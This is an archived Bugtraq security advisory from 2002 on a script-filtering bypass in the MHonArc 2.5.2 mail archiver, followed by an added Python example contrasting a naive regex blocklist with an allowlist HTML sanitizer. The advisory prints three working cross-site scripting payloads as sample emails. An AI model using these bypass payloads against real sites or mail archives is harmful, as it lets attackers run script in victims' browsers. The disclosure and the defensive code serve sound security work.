Bugtraq mailing list archives
MHonArc v2.5.2 Script Filtering Bypass Vulnerability
From: "TAKAGI, Hiromitsu" <takagi.hiromitsu () aist go jp>
Date: Fri, 19 Apr 2002 06:53:54 +0900
MHonArc v2.5.2 Script Filtering Bypass Vulnerability
====================================================

Affected:
---------
  MHonArc v2.5.2
  http://www.mhonarc.org/

Fixed:
------
  MHonArc v2.5.3
  http://www.mhonarc.org/MHonArc/CHANGES

Problem:
--------
  MHonArc has a feature which filters out scripting tags from incoming
  HTML mails, and it is enabled by default. However, some variations of
  scripting tags will not be filtered.

Exploit 1:
----------
From: test () example com
To: test () example com
Date: Sun, 16 Dec 2001 00:00:00 +0900
Subject: test
MIME-Version: 1.0
Content-Type: text/html

<HTML>
<SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>
</HTML>
----------

Exploit 2:
----------
From: test () example com
To: test () example com
Date: Sun, 16 Dec 2001 00:00:00 +0900
Subject: test
MIME-Version: 1.0
Content-Type: text/html

<HTML>
<IMG SRC=javascript:alert(document.domain)>
</HTML>
----------

Exploit 3:
----------
From: test () example com
To: test () example com
Date: Sun, 16 Dec 2001 00:00:00 +0900
Subject: test
MIME-Version: 1.0
Content-Type: text/html

<HTML>
<B foo=&{alert(document.domain)};> Vulnerable only if Netscape 4.x is used to browse.</B>
</HTML>
----------

Vendor Status:
--------------
  The author was contacted on December 16, 2001.
  The fixed version was released on April 18, 2002.

Best regards,
--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://staff.aist.go.jp/takagi.hiromitsu/
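The three samples above, run through two filters, as an added example that is not part of the original post and is not MHonArc's code. `naive_strip` is a hypothetical single-pass blocklist filter assumed here to model the failure class; `sanitize` is an allowlist filter (tag and attribute policy assumed) that re-serialises parsed tokens instead of deleting patterns from the input.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed bodies mirroring the three samples in the advisory.
SAMPLES = [
    "<SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>",
    "<IMG SRC=javascript:alert(document.domain)>",
    "<B foo=&{alert(document.domain)};>Vulnerable only if Netscape 4.x</B>",
]
# Allowlist (assumed policy): every attribute kept here is a URL attribute.
ALLOWED = {"b": (), "i": (), "p": (), "a": ("href",), "img": ("src",)}
DROP_CONTENT = {"script", "style"}  # element bodies are discarded entirely

def naive_strip(html):
    """Hypothetical single-pass blocklist filter; not MHonArc's code."""
    return re.sub(r"</?script[^>]*>", "", html, flags=re.I)

def url_ok(value):
    """Accept relative URLs and http/https/mailto; reject other schemes and &{...}."""
    v = re.sub(r"[\x00-\x20]", "", value or "").lower()
    m = re.match(r"([a-z][a-z0-9+.-]*):", v)
    return "&{" not in v and (m is None or m.group(1) in {"http", "https", "mailto"})

class Sanitizer(HTMLParser):
    """Re-serialises parsed tokens; no input markup is copied through raw."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
        elif tag in ALLOWED and not self.skip:
            kept = [(k, v) for k, v in attrs if k in ALLOWED[tag] and url_ok(v)]
            self.out.append(f"<{tag}" + "".join(f' {k}="{escape(v or "")}"' for k, v in kept) + ">")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)  # stray close tags must not go negative
        elif tag in ALLOWED and tag != "img" and not self.skip:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))  # text is always emitted escaped

def sanitize(html):
    parser = Sanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)
```

Deleting the inner tags from sample 1 leaves a well-formed `<SCRIPT>` element, and samples 2 and 3 contain no script tag for a blocklist to match; the allowlist output contains only tags and attributes it constructed itself.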